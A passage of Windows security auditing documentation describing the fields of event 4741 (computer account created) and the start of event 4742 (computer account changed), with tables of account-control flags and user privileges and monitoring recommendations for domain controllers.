<Data Name="TargetSid">S-1-5-21-3457937927-2839227994-823803824-6116</Data>
<Data Name="SubjectUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data>
<Data Name="SubjectUserName">dadmin</Data>
<Data Name="SubjectDomainName">CONTOSO</Data>
<Data Name="SubjectLogonId">0xc88b2</Data>
<Data Name="PrivilegeList">-</Data>
<Data Name="SamAccountName">WIN81$</Data>
<Data Name="DisplayName">-</Data>
<Data Name="UserPrincipalName">-</Data>
<Data Name="HomeDirectory">-</Data>
<Data Name="HomePath">-</Data>
<Data Name="ScriptPath">-</Data>
<Data Name="ProfilePath">-</Data>
<Data Name="UserWorkstations">-</Data>
<Data Name="PasswordLastSet">8/12/2015 11:41:39 AM</Data>
<Data Name="AccountExpires">%%1794</Data>
<Data Name="PrimaryGroupId">515</Data>
<Data Name="AllowedToDelegateTo">-</Data>
<Data Name="OldUacValue">0x0</Data>
<Data Name="NewUacValue">0x80</Data>
<Data Name="UserAccountControl">%%2087</Data>
<Data Name="UserParameters">-</Data>
<Data Name="SidHistory">-</Data>
<Data Name="LogonHours">%%1793</Data>
<Data Name="DnsHostName">Win81.contoso.local</Data>
<Data Name="ServicePrincipalNames">HOST/Win81.contoso.local RestrictedKrbHost/Win81.contoso.local HOST/WIN81 RestrictedKrbHost/WIN81</Data>
</EventData>
</Event>

Required Server Roles: Active Directory domain controller.


Minimum OS Version: Windows Server 2008.
Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID]: SID of the account that requested the "create Computer object" operation. Event Viewer
automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the
source data in the event.

Note: A security identifier (SID) is a unique value of variable length used to identify a trustee (security
principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain
controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that user
from the database and places it in the access token for that user. The system uses the SID in the access token to
identify the user in all subsequent interactions with Windows security. Once a SID has been used as the
unique identifier for a user or group, it can never be used again to identify another user or group. For more
information about SIDs, see Security identifiers.

Account Name [Type = UnicodeString]: the name of the account that requested the “create Computer
object” operation.
Account Domain [Type = UnicodeString]: subject’s domain name. Formats vary, and include the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the
value of this field is “NT AUTHORITY”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events
that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”
New Computer Account:
Security ID [Type = SID]: SID of the created computer account. Event Viewer automatically tries to resolve
SIDs and show the account name. If the SID cannot be resolved, you will see the source data in the event.
Account Name [Type = UnicodeString]: the name of the computer account that was created. For example:
WIN81$
Account Domain [Type = UnicodeString]: domain name of created computer account. Formats vary, and
include the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
Attributes:
SAM Account Name [Type = UnicodeString]: logon name for account used to support clients and servers
from previous versions of Windows (pre-Windows 2000 logon name). The value of sAMAccountName
attribute of new computer object. For example: WIN81$.
Display Name [Type = UnicodeString]: the value of displayName attribute of new computer object. It is a
name displayed in the address book for a particular account (typically – user account). This is usually the
combination of the user's first name, middle initial, and last name. For computer objects, it is optional, and
typically is not set. You can change this attribute by using Active Directory Users and Computers, or through
a script, for example. This parameter might not be captured in the event, and in that case appears as “-”.
User Principal Name [Type = UnicodeString]: internet-style login name for the account, based on the
Internet standard RFC 822. By convention this should map to the account's email name. This parameter
contains the value of userPrincipalName attribute of new computer object. For computer objects, it is
optional, and typically is not set. You can change this attribute by using Active Directory Users and
Computers, or through a script, for example. This parameter might not be captured in the event, and in that
case appears as “-”.
Home Directory [Type = UnicodeString]: user's home directory. If homeDrive attribute is set and specifies
a drive letter, homeDirectory should be a UNC path. The path must be a network UNC of the form
\\Server\Share\Directory. This parameter contains the value of homeDirectory attribute of new computer
object. For computer objects, it is optional, and typically is not set. You can change this attribute by using
Active Directory Users and Computers, or through a script, for example. This parameter might not be
captured in the event, and in that case appears as “-”.
Home Drive [Type = UnicodeString]: specifies the drive letter to which to map the UNC path specified by
homeDirectory account’s attribute. The drive letter must be specified in the form “DRIVE_LETTER:”. For
example – “H:”. This parameter contains the value of homeDrive attribute of new computer object. For
computer objects, it is optional, and typically is not set. You can change this attribute by using Active
Directory Users and Computers, or through a script, for example. This parameter might not be captured in
the event, and in that case appears as “-”.
Script Path [Type = UnicodeString]: specifies the path of the account's logon script. This parameter contains
the value of scriptPath attribute of new computer object. For computer objects, it is optional, and typically is
not set. You can change this attribute by using Active Directory Users and Computers, or through a script,
for example. This parameter might not be captured in the event, and in that case appears as “-”.
Profile Path [Type = UnicodeString]: specifies a path to the account's profile. This value can be a null string,
a local absolute path, or a UNC path. This parameter contains the value of profilePath attribute of new
computer object. For computer objects, it is optional, and typically is not set. You can change this attribute by
using Active Directory Users and Computers, or through a script, for example. This parameter might not be
captured in the event, and in that case appears as “-”.
User Workstations [Type = UnicodeString]: contains the list of NetBIOS or DNS names of the computers
from which the user can logon. Each computer name is separated by a comma. The name of a computer is
the sAMAccountName property of a computer object. This parameter contains the value of
userWorkstations attribute of new computer object. For computer objects, it is optional, and typically is not
set. You can change this attribute by using Active Directory Users and Computers, or through a script, for
example. This parameter might not be captured in the event, and in that case appears as “-”.
Password Last Set [Type = UnicodeString]: the last time the account's password was modified. For a computer
account created manually with the Active Directory Users and Computers snap-in, this field typically has the value
"<never>". For a computer account created during the standard domain join procedure, this field contains the
time the computer object was created, because the password is set as part of the domain join. For
example: 8/12/2015 11:41:39 AM. This parameter contains the value of the pwdLastSet attribute of the new
computer object.
Account Expires [Type = UnicodeString]: the date when the account expires. This parameter contains the
value of accountExpires attribute of new computer object. For computer objects, it is optional, and typically
is not set. You can change this attribute by using Active Directory Users and Computers, or through a script,
for example. This parameter might not be captured in the event, and in that case appears as “-”.
Primary Group ID [Type = UnicodeString]: Relative Identifier (RID) of the computer object's primary group.

Note: A relative identifier (RID) is a variable-length number that is assigned to objects at creation and
becomes part of the object's Security Identifier (SID), which uniquely identifies an account or group within a
domain.

Typically, the Primary Group field for new computer accounts has one of the following values:
516 (Domain Controllers) – for domain controllers.
521 (Read-only Domain Controllers) – for read-only domain controllers (RODC).
515 (Domain Computers) – for member servers and workstations.
See this article https://support.microsoft.com/kb/243330 for more information. This parameter contains the
value of the primaryGroupID attribute of the new computer object.
AllowedToDelegateTo [Type = UnicodeString]: the list of SPNs to which this account can present delegated
credentials. Can be changed using Active Directory Users and Computers management console in Delegation
tab of computer account. Typically it is set to “-“ for new computer objects. This parameter contains the value of
AllowedToDelegateTo attribute of new computer object. See description of AllowedToDelegateTo field for
“4742: A computer account was changed” event for more details.

Note: A Service Principal Name (SPN) is the name by which a client uniquely identifies an instance of a
service. If you install multiple instances of a service on computers throughout a forest, each instance must have
its own SPN. A given service instance can have multiple SPNs if there are multiple names that clients might
use for authentication. For example, an SPN always includes the name of the host computer on which the
service instance is running, so a service instance might register an SPN for each name or alias of its host.

Old UAC Value [Type = UnicodeString]: specifies flags that control password, lockout, disable/enable,
script, and other behavior for the user or computer account. Old UAC Value is always "0x0" for new
computer accounts, because this parameter holds the previous account-control flags of the computer
object and a newly created object has none.
New UAC Value [Type = UnicodeString]: specifies flags that control password, lockout, disable/enable,
script, and other behavior for the user or computer account. This parameter holds the account-control
flags of the new computer object.
To decode this value, you can go through the property value definitions in "Table 7. User's or Computer's
account UAC flags." from largest to smallest. Compare each property value to the flags value in the event. If the
flags value in the event is greater than or equal to the property value, then the property is "set" and applies to that
event. Subtract the property value from the flags value in the event, note that the flag applies, and then go on to
the next flag. (This walk gives the same result as testing each flag's bit with a bitwise AND.)
Here's an example: Flags value from event: 0x15
Decoding:
• PASSWD_NOTREQD 0x0020
• LOCKOUT 0x0010
• HOMEDIR_REQUIRED 0x0008
• (undeclared) 0x0004
• ACCOUNTDISABLE 0x0002
• SCRIPT 0x0001
0x0020 > 0x15, so PASSWD_NOTREQD does not apply to this event
0x10 <= 0x15, so LOCKOUT applies to this event. 0x15 - 0x10 = 0x5
0x8 > 0x5, so HOMEDIR_REQUIRED does not apply to this event
0x4 <= 0x5, so the undeclared bit is set; it has no defined meaning, so note it and move on. 0x5 - 0x4 = 0x1
0x2 > 0x1, so ACCOUNTDISABLE does not apply to this event
0x1 = 0x1, so SCRIPT applies to this event. 0x1 - 0x1 = 0x0, we're done.
So this UAC flags value decodes to: LOCKOUT and SCRIPT
Caveat: Table 7 lists the bit layout of the LDAP userAccountControl attribute, but the Old UAC Value and New
UAC Value fields of this event are written by SAM and use the USER_ACCOUNT flag layout defined in MS-SAMR,
in which the bits sit at different positions (for example, USER_WORKSTATION_TRUST_ACCOUNT is 0x80 there).
That is why the sample event above carries New UAC Value 0x80 for a freshly domain-joined workstation: read with
Table 7, 0x80 would mean ENCRYPTED_TEXT_PWD_ALLOWED, a flag the Security Monitoring Recommendations
say should never be set on a computer account. When you build detections on this event, key them on the User
Account Control text field (rendered from message IDs such as %%2087 in the XML), or decode the hex fields
with the SAM layout rather than with Table 7.
User Account Control [Type = UnicodeString]: shows the list of changes in userAccountControl attribute.
You will see a line of text for each change. For new computer accounts, when the object for this account was
created, the userAccountControl value was considered to be “0x0”, and then it was changed from “0x0” to
the real value for the account's userAccountControl attribute. See possible values in the table below. In the
“User Account Control field text” column, you can see the text that will be displayed in the User Account
Control field in 4741 event.

Each row below gives the flag name, its userAccountControl value in hexadecimal and decimal, the description, and the text shown in the User Account Control field of a 4741 event.

SCRIPT (0x0001, 1): The logon script will be run. Field text: changes of this flag do not show in 4741 events.
ACCOUNTDISABLE (0x0002, 2): The user account is disabled. Field text: Account Disabled / Account Enabled.
Undeclared (0x0004, 4): This flag is undeclared. Field text: changes of this flag do not show in 4741 events.
HOMEDIR_REQUIRED (0x0008, 8): The home folder is required. Field text: 'Home Directory Required' - Enabled / 'Home Directory Required' - Disabled.
LOCKOUT (0x0010, 16): The account is currently locked out. Field text: changes of this flag do not show in 4741 events.
PASSWD_NOTREQD (0x0020, 32): No password is required. Field text: 'Password Not Required' - Enabled / 'Password Not Required' - Disabled.
PASSWD_CANT_CHANGE (0x0040, 64): The user cannot change the password. This is a permission on the user's object. Field text: changes of this flag do not show in 4741 events.
ENCRYPTED_TEXT_PWD_ALLOWED (0x0080, 128): The user can send an encrypted password. Can be set using the "Store password using reversible encryption" checkbox. Field text: 'Encrypted Text Password Allowed' - Disabled / 'Encrypted Text Password Allowed' - Enabled.
TEMP_DUPLICATE_ACCOUNT (0x0100, 256): This is an account for users whose primary account is in another domain. This account provides user access to this domain, but not to any domain that trusts this domain. This is sometimes referred to as a local user account. Field text: cannot be set for a computer account.
NORMAL_ACCOUNT (0x0200, 512): This is a default account type that represents a typical user. Field text: 'Normal Account' - Disabled / 'Normal Account' - Enabled.
INTERDOMAIN_TRUST_ACCOUNT (0x0800, 2048): This is a permit to trust an account for a system domain that trusts other domains. Field text: cannot be set for a computer account.
WORKSTATION_TRUST_ACCOUNT (0x1000, 4096): This is a computer account for a computer that is running Microsoft Windows NT 4.0 Workstation, Microsoft Windows NT 4.0 Server, Microsoft Windows 2000 Professional, or Windows 2000 Server and is a member of this domain. Field text: 'Workstation Trust Account' - Disabled / 'Workstation Trust Account' - Enabled.
SERVER_TRUST_ACCOUNT (0x2000, 8192): This is a computer account for a domain controller that is a member of this domain. Field text: 'Server Trust Account' - Enabled / 'Server Trust Account' - Disabled.
DONT_EXPIRE_PASSWORD (0x10000, 65536): Represents a password that should never expire on the account. Can be set using the "Password never expires" checkbox. Field text: 'Don't Expire Password' - Disabled / 'Don't Expire Password' - Enabled.
MNS_LOGON_ACCOUNT (0x20000, 131072): This is an MNS logon account. Field text: 'MNS Logon Account' - Disabled / 'MNS Logon Account' - Enabled.
SMARTCARD_REQUIRED (0x40000, 262144): When this flag is set, it forces the user to log on by using a smart card. Field text: 'Smartcard Required' - Disabled / 'Smartcard Required' - Enabled.
TRUSTED_FOR_DELEGATION (0x80000, 524288): When this flag is set, the service account (the user or computer account) under which a service runs is trusted for Kerberos delegation. Any such service can impersonate a client requesting the service. To enable a service for Kerberos delegation, you must set this flag on the userAccountControl property of the service account. If you enable Kerberos constrained or unconstrained delegation, or disable these types of delegation, in the Delegation tab, this flag changes. Field text: 'Trusted For Delegation' - Enabled / 'Trusted For Delegation' - Disabled.
NOT_DELEGATED (0x100000, 1048576): When this flag is set, the security context of the user is not delegated to a service even if the service account is set as trusted for Kerberos delegation. Can be set using the "Account is sensitive and cannot be delegated" checkbox. Field text: 'Not Delegated' - Disabled / 'Not Delegated' - Enabled.
USE_DES_KEY_ONLY (0x200000, 2097152): Restrict this principal to use only Data Encryption Standard (DES) encryption types for keys. Can be set using the "Use Kerberos DES encryption types for this account" checkbox. Field text: 'Use DES Key Only' - Disabled / 'Use DES Key Only' - Enabled.
DONT_REQ_PREAUTH (0x400000, 4194304): This account does not require Kerberos pre-authentication for logging on. Can be set using the "Do not require Kerberos preauthentication" checkbox. Field text: 'Don't Require Preauth' - Disabled / 'Don't Require Preauth' - Enabled.
PASSWORD_EXPIRED (0x800000, 8388608): The user's password has expired. Field text: changes of this flag do not show in 4741 events.
TRUSTED_TO_AUTH_FOR_DELEGATION (0x1000000, 16777216): The account is enabled for delegation. This is a security-sensitive setting. Accounts that have this option enabled should be tightly controlled. This setting lets a service that runs under the account assume a client's identity and authenticate as that user to other remote servers on the network. If you enable Kerberos protocol transition delegation, or disable this type of delegation, in the Delegation tab, this flag changes. Field text: 'Trusted To Authenticate For Delegation' - Disabled / 'Trusted To Authenticate For Delegation' - Enabled.
PARTIAL_SECRETS_ACCOUNT (0x04000000, 67108864): The account is a read-only domain controller (RODC). This is a security-sensitive setting. Removing this setting from an RODC compromises security on that server. Field text: no information.

Table 7. User's or Computer's account UAC flags.

User Parameters [Type = UnicodeString]: if you change any setting using the Active Directory Users and
Computers management console in the Dial-in tab of the computer's account properties, then you will see <value
changed, but not displayed> in this field in "4742(S): A computer account was changed." This parameter
might not be captured in the event, and in that case appears as "-".
SID History [Type = UnicodeString]: contains previous SIDs used for the object if the object was moved
from another domain. Whenever an object is moved from one domain to another, a new SID is created and
becomes the objectSID. The previous SID is added to the sIDHistory property. This parameter contains the
value of sIDHistory attribute of new computer object. This parameter might not be captured in the event,
and in that case appears as “-”.
Logon Hours [Type = UnicodeString]: hours during which the account is allowed to log on to the domain. The value
of the logonHours attribute of the new computer object. For computer objects, it is optional, and typically is not set.
You can change this attribute by using Active Directory Users and Computers, or through a script, for
example. You will see the value <value not set> for newly created computer accounts in event 4741.
DNS Host Name [Type = UnicodeString]: name of computer account as registered in DNS. The value of
dNSHostName attribute of new computer object. For manually created computer account objects this field
has value “-“.
Service Principal Names [Type = UnicodeString]: the list of SPNs registered for the computer account. For
new computer accounts it will typically contain HOST SPNs and RestrictedKrbHost SPNs. The value of the
servicePrincipalName attribute of the new computer object. For manually created computer objects it is
typically "-". This is an example of the Service Principal Names field for a newly domain-joined
workstation:
HOST/Win81.contoso.local
RestrictedKrbHost/Win81.contoso.local
HOST/WIN81
RestrictedKrbHost/WIN81
Additional Information:
Privileges [Type = UnicodeString]: the list of user privileges which were used during the operation, for
example, SeBackupPrivilege. This parameter might not be captured in the event, and in that case appears as “-”.
See full list of user privileges in the table below:

Each row gives the privilege name, the user right name shown in Group Policy (in parentheses), and the description.

SeAssignPrimaryTokenPrivilege (Replace a process-level token): Required to assign the primary token of a process. With this privilege, the user can initiate a process to replace the default token associated with a started subprocess.
SeAuditPrivilege (Generate security audits): With this privilege, the user can add entries to the security log.
SeBackupPrivilege (Back up files and directories): Required to perform backup operations. With this privilege, the user can bypass file and directory, registry, and other persistent object permissions for the purposes of backing up the system. This privilege causes the system to grant all read access control to any file, regardless of the access control list (ACL) specified for the file. Any access request other than read is still evaluated with the ACL. The following access rights are granted if this privilege is held: READ_CONTROL, ACCESS_SYSTEM_SECURITY, FILE_GENERIC_READ, FILE_TRAVERSE.
SeChangeNotifyPrivilege (Bypass traverse checking): Required to receive notifications of changes to files or directories. This privilege also causes the system to skip all traversal access checks. With this privilege, the user can traverse directory trees even though the user may not have permissions on the traversed directory. This privilege does not allow the user to list the contents of a directory, only to traverse directories.
SeCreateGlobalPrivilege (Create global objects): Required to create named file mapping objects in the global namespace during Terminal Services sessions.
SeCreatePagefilePrivilege (Create a pagefile): With this privilege, the user can create and change the size of a pagefile.
SeCreatePermanentPrivilege (Create permanent shared objects): Required to create a permanent object. This privilege is useful to kernel-mode components that extend the object namespace. Components that are running in kernel mode already have this privilege inherently; it is not necessary to assign them the privilege.
SeCreateSymbolicLinkPrivilege (Create symbolic links): Required to create a symbolic link.
SeCreateTokenPrivilege (Create a token object): Allows a process to create a token which it can then use to get access to any local resources when the process uses NtCreateToken() or other token-creation APIs. When a process requires this privilege, we recommend using the LocalSystem account (which already includes the privilege), rather than creating a separate user account and assigning this privilege to it.
SeDebugPrivilege (Debug programs): Required to debug and adjust the memory of a process owned by another account. With this privilege, the user can attach a debugger to any process or to the kernel. Developers who are debugging their own applications do not need this user right. Developers who are debugging new system components need this user right. This user right provides complete access to sensitive and critical operating system components.
SeEnableDelegationPrivilege (Enable computer and user accounts to be trusted for delegation): Required to mark user and computer accounts as trusted for delegation. With this privilege, the user can set the Trusted for Delegation setting on a user or computer object. The user or object that is granted this privilege must have write access to the account control flags on the user or computer object. A server process running on a computer (or under a user context) that is trusted for delegation can access resources on another computer using the delegated credentials of a client, as long as the account of the client does not have the Account cannot be delegated account control flag set.
SeImpersonatePrivilege (Impersonate a client after authentication): With this privilege, the user can impersonate other accounts.
SeIncreaseBasePriorityPrivilege (Increase scheduling priority): Required to increase the base priority of a process. With this privilege, the user can use a process with Write property access to another process to increase the execution priority assigned to the other process. A user with this privilege can change the scheduling priority of a process through the Task Manager user interface.
SeIncreaseQuotaPrivilege (Adjust memory quotas for a process): Required to increase the quota assigned to a process. With this privilege, the user can change the maximum memory that can be consumed by a process.
SeIncreaseWorkingSetPrivilege (Increase a process working set): Required to allocate more memory for applications that run in the context of users.
SeLoadDriverPrivilege (Load and unload device drivers): Required to load or unload a device driver. With this privilege, the user can dynamically load and unload device drivers or other code into kernel mode. This user right does not apply to Plug and Play device drivers.
SeLockMemoryPrivilege (Lock pages in memory): Required to lock physical pages in memory. With this privilege, the user can use a process to keep data in physical memory, which prevents the system from paging the data to virtual memory on disk. Exercising this privilege could significantly affect system performance by decreasing the amount of available random access memory (RAM).
SeMachineAccountPrivilege (Add workstations to domain): With this privilege, the user can create a computer account. This privilege is valid only on domain controllers.
SeManageVolumePrivilege (Perform volume maintenance tasks): Required to run maintenance tasks on a volume, such as remote defragmentation.
SeProfileSingleProcessPrivilege (Profile single process): Required to gather profiling information for a single process. With this privilege, the user can use performance monitoring tools to monitor the performance of non-system processes.
SeRelabelPrivilege (Modify an object label): Required to modify the mandatory integrity level of an object.
SeRemoteShutdownPrivilege (Force shutdown from a remote system): Required to shut down a system using a network request.
SeRestorePrivilege (Restore files and directories): Required to perform restore operations. This privilege causes the system to grant all write access control to any file, regardless of the ACL specified for the file. Any access request other than write is still evaluated with the ACL. Additionally, this privilege enables you to set any valid user or group SID as the owner of a file. The following access rights are granted if this privilege is held: WRITE_DAC, WRITE_OWNER, ACCESS_SYSTEM_SECURITY, FILE_GENERIC_WRITE, FILE_ADD_FILE, FILE_ADD_SUBDIRECTORY, DELETE. With this privilege, the user can bypass file, directory, registry, and other persistent object permissions when restoring backed up files and directories, and it determines which users can set any valid security principal as the owner of an object.
SeSecurityPrivilege (Manage auditing and security log): Required to perform a number of security-related functions, such as controlling and viewing audit events in the security event log. With this privilege, the user can specify object access auditing options for individual resources, such as files, Active Directory objects, and registry keys. A user with this privilege can also view and clear the security log.
SeShutdownPrivilege (Shut down the system): Required to shut down a local system.
SeSyncAgentPrivilege (Synchronize directory service data): This privilege enables the holder to read all objects and properties in the directory, regardless of the protection on the objects and properties. By default, it is assigned to the Administrator and LocalSystem accounts on domain controllers. With this privilege, the user can synchronize all directory service data. This is also known as Active Directory synchronization.
SeSystemEnvironmentPrivilege (Modify firmware environment values): Required to modify the nonvolatile RAM of systems that use this type of memory to store configuration information.
SeSystemProfilePrivilege (Profile system performance): Required to gather profiling information for the entire system. With this privilege, the user can use performance monitoring tools to monitor the performance of system processes.
SeSystemtimePrivilege (Change the system time): Required to modify the system time. With this privilege, the user can change the time and date on the internal clock of the computer. Users that are assigned this user right can affect the appearance of event logs. If the system time is changed, events that are logged will reflect this new time, not the actual time that the events occurred.
SeTakeOwnershipPrivilege (Take ownership of files or other objects): Required to take ownership of an object without being granted discretionary access. This privilege allows the owner value to be set only to those values that the holder may legitimately assign as the owner of an object. With this privilege, the user can take ownership of any securable object in the system, including Active Directory objects, files and folders, printers, registry keys, processes, and threads.
SeTcbPrivilege (Act as part of the operating system): This privilege identifies its holder as part of the trusted computer base. This user right allows a process to impersonate any user without authentication. The process can therefore gain access to the same local resources as that user.
SeTimeZonePrivilege (Change the time zone): Required to adjust the time zone associated with the computer's internal clock.
SeTrustedCredManAccessPrivilege (Access Credential Manager as a trusted caller): Required to access Credential Manager as a trusted caller.
SeUndockPrivilege (Remove computer from docking station): Required to undock a laptop. With this privilege, the user can undock a portable computer from its docking station without logging on.
SeUnsolicitedInputPrivilege (Not applicable): Required to read unsolicited input from a terminal device.

Table 8. User Privileges.

Security Monitoring Recommendations
For 4741(S): A computer account was created.

Important: For this event, also see Appendix A: Security monitoring recommendations for many audit events.

If your information security monitoring policy requires you to monitor computer account creation, monitor
this event.
Consider whether to track the following fields and values:

FIELD AND VALUE TO TRACK | REASON TO TRACK

SAM Account Name: empty or "-" | This field must contain the computer account name. If it is empty or "-", it might indicate an anomaly.

Display Name is not "-"; User Principal Name is not "-"; Home Directory is not "-"; Home Drive is not "-"; Script Path is not "-"; Profile Path is not "-"; User Workstations is not "-"; AllowedToDelegateTo is not "-" | Typically these fields are "-" for new computer accounts. Other values might indicate an anomaly and should be monitored.

Password Last Set is <never> | This typically means this is a manually created computer account, which you might need to monitor.

Account Expires is not <never> | Typically this field is <never> for new computer accounts. Other values might indicate an anomaly and should be monitored.

Primary Group ID is any value other than 515 | Typically, the Primary Group ID value is one of the following: 516 for domain controllers; 521 for read-only domain controllers (RODCs); 515 for servers and workstations (domain computers). If the Primary Group ID is 516 or 521, it is a new domain controller or RODC, and the event should be monitored. If the value is not 516, 521, or 515, it is not a typical value and should be monitored.

Old UAC Value is not 0x0 | Typically this field is 0x0 for new computer accounts. Other values might indicate an anomaly and should be monitored.

SID History is not "-" | This field will always be "-" unless the account was migrated from another domain.

Logon Hours value other than <value not set> | This should always be <value not set> for new computer accounts.
Consider whether to track the following account control flags:

USER ACCOUNT CONTROL FLAG TO TRACK / INFORMATION ABOUT THE FLAG

'Encrypted Text Password Allowed' – Enabled
    Should not be set for computer accounts. By default, it will not be set, and it cannot be set in the account properties in Active Directory Users and Computers.

'Server Trust Account' – Enabled
    Should be enabled only for domain controllers.

'Don't Expire Password' – Enabled
    Should not be enabled for new computer accounts, because the password automatically changes every 30 days by default. For computer accounts, this flag cannot be set in the account properties in Active Directory Users and Computers.

'Smartcard Required' – Enabled
    Should not be enabled for new computer accounts.

'Trusted For Delegation' – Enabled
    Should not be enabled for new member servers and workstations. It is enabled by default for new domain controllers.

'Not Delegated' – Enabled
    Should not be enabled for new computer accounts.

'Use DES Key Only' – Enabled
    Should not be enabled for new computer accounts. For computer accounts, it cannot be set in the account properties in Active Directory Users and Computers.

'Don't Require Preauth' – Enabled
    Should not be enabled for new computer accounts. For computer accounts, it cannot be set in the account properties in Active Directory Users and Computers.

'Trusted To Authenticate For Delegation' – Enabled
    Should not be enabled for new computer accounts by default.

4742(S): A computer account was changed.
4/5/2019 • 16 minutes to read

Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Computer Account Management
Event Description:
This event generates every time a computer object is changed.
This event generates only on domain controllers.
You might see the same values for Subject\Security ID and Computer Account That Was Changed\Security ID in this event. This usually happens when you reboot a computer after adding it to the domain (the change takes effect after the reboot).
For each change, a separate 4742 event will be generated.
Some changes do not invoke a 4742 event, for example, changes made using the Active Directory Users and Computers management console in the Managed By tab of the computer account properties.
You might see this event without any changes inside, that is, where all Changed Attributes appear as “-”. This usually happens when a change is made to an attribute that is not listed in the event. In this case there is no way to determine which attribute was changed. For example, this would happen if you change the Description of a group object using the Active Directory Users and Computers administrative console. Also, if the discretionary access control list (DACL) is changed, a 4742 event will generate, but all attributes will be “-”.
Important: If you manually change any user-related setting or attribute, for example if you set the SMARTCARD_REQUIRED flag in userAccountControl for the computer account, then the sAMAccountType of the computer account will be changed to NORMAL_USER_ACCOUNT and you will get “4738: A user account was changed” instead of 4742 for this computer account. Essentially, the computer account will “become” a user account. For NORMAL_USER_ACCOUNT you will always get events from the Audit User Account Management subcategory. We strongly recommend that you avoid changing any user-related settings manually for computer objects.
Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:

<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System>
    <Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
    <EventID>4742</EventID>
    <Version>0</Version>
    <Level>0</Level>
    <Task>13825</Task>
    <Opcode>0</Opcode>
    <Keywords>0x8020000000000000</Keywords>
    <TimeCreated SystemTime="2015-08-14T02:35:01.252397000Z" />
    <EventRecordID>171754</EventRecordID>
    <Correlation />
    <Execution ProcessID="520" ThreadID="1108" />
    <Channel>Security</Channel>
    <Computer>DC01.contoso.local</Computer>
    <Security />
  </System>
  <EventData>
    <Data Name="ComputerAccountChange">-</Data>
    <Data Name="TargetUserName">WIN81$</Data>
    <Data Name="TargetDomainName">CONTOSO</Data>
    <Data Name="TargetSid">S-1-5-21-3457937927-2839227994-823803824-6116</Data>
    <Data Name="SubjectUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data>
    <Data Name="SubjectUserName">dadmin</Data>
    <Data Name="SubjectDomainName">CONTOSO</Data>
    <Data Name="SubjectLogonId">0x2e80c</Data>
    <Data Name="PrivilegeList">-</Data>
    <Data Name="SamAccountName">-</Data>
    <Data Name="DisplayName">-</Data>
    <Data Name="UserPrincipalName">-</Data>
    <Data Name="HomeDirectory">-</Data>
    <Data Name="HomePath">-</Data>
    <Data Name="ScriptPath">-</Data>
    <Data Name="ProfilePath">-</Data>
    <Data Name="UserWorkstations">-</Data>
    <Data Name="PasswordLastSet">-</Data>
    <Data Name="AccountExpires">-</Data>
    <Data Name="PrimaryGroupId">-</Data>
    <Data Name="AllowedToDelegateTo">%%1793</Data>
    <Data Name="OldUacValue">0x80</Data>
    <Data Name="NewUacValue">0x2080</Data>
    <Data Name="UserAccountControl">%%2093</Data>
    <Data Name="UserParameters">-</Data>
    <Data Name="SidHistory">-</Data>
    <Data Name="LogonHours">-</Data>
    <Data Name="DnsHostName">-</Data>
    <Data Name="ServicePrincipalNames">-</Data>
  </EventData>
</Event>

Required Server Roles: Active Directory domain controller.
Minimum OS Version: Windows Server 2008.
Event Versions: 0.
Field Descriptions:
Subject:
• Security ID [Type = SID]: SID of the account that requested the “change Computer object” operation. Event Viewer automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the source data in the event.

Note A security identifier (SID) is a unique value of variable length used to identify a trustee (security principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that user from the database and places it in the access token for that user. The system uses the SID in the access token to identify the user in all subsequent interactions with Windows security. When a SID has been used as the unique identifier for a user or group, it cannot ever be used again to identify another user or group. For more information about SIDs, see Security identifiers.

• Account Name [Type = UnicodeString]: the name of the account that requested the “change Computer object” operation.
• Account Domain [Type = UnicodeString]: subject’s domain name. Formats vary, and include the following:
  • Domain NETBIOS name example: CONTOSO
  • Lowercase full domain name: contoso.local
  • Uppercase full domain name: CONTOSO.LOCAL
  For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the value of this field is “NT AUTHORITY”.
• Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”
Computer Account That Was Changed:
• Security ID [Type = SID]: SID of the changed computer account. Event Viewer automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the source data in the event.
• Account Name [Type = UnicodeString]: the name of the computer account that was changed. For example: WIN81$
• Account Domain [Type = UnicodeString]: domain name of the changed computer account. Formats vary, and include the following:
  • Domain NETBIOS name example: CONTOSO
  • Lowercase full domain name: contoso.local
  • Uppercase full domain name: CONTOSO.LOCAL
Changed Attributes:

Note If an attribute was not changed, it will have the “-” value.

• SAM Account Name [Type = UnicodeString]: logon name for the account used to support clients and servers from previous versions of Windows (pre-Windows 2000 logon name). If the value of the sAMAccountName attribute of the computer object was changed, you will see the new value here. For example: WIN8$.
• Display Name [Type = UnicodeString]: the name displayed in the address book for a particular account (typically a user account). This is usually the combination of the user's first name, middle initial, and last name. For computer objects, it is optional, and typically is not set. You can change this attribute by using Active Directory Users and Computers, or through a script, for example. If the value of the displayName attribute of the computer object was changed, you will see the new value here.
• User Principal Name [Type = UnicodeString]: internet-style login name for the account, based on the Internet standard RFC 822. By convention this should map to the account's email name. If the value of the userPrincipalName attribute of the computer object was changed, you will see the new value here. For computer objects, it is optional, and typically is not set. You can change this attribute by using Active Directory Users and Computers, or through a script, for example.
